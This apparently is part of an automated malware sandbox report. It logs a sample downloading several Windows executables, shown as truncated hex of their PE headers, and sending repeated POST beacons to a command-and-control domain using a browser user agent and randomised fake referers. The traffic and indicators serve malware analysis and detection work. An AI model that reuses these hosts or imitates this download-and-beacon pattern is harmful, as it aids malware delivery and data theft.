00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:54:04 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:42 GMTETag: "62543dae-6db00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:54:05 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 16:52:46 GMTETag: "6292535e-13900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:54:05 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:36 GMTETag: "62543da8-991b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:54:06 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:40:08 GMTETag: "62543dc8-a73b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:54:09 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:58 GMTETag: "62543dbe-3e1b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:54:09 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 12:28:56 GMTETag: "62541f08-10c5d7"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynbbrbceap.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: linislominyt11.at
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oywaxqplv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: linislominyt11.at
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://grmajt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: linislominyt11.at
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ujdgu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: linislominyt11.at
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xysctbcs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: linislominyt11.at
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hghdetsybj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: linislominyt11.at
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://niskfgcbn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: linislominyt11.at
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vuhmrda.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: linislominyt11.at
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kmthapyqsb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: linislominyt11.at
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tqgrrc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: linislominyt11.at
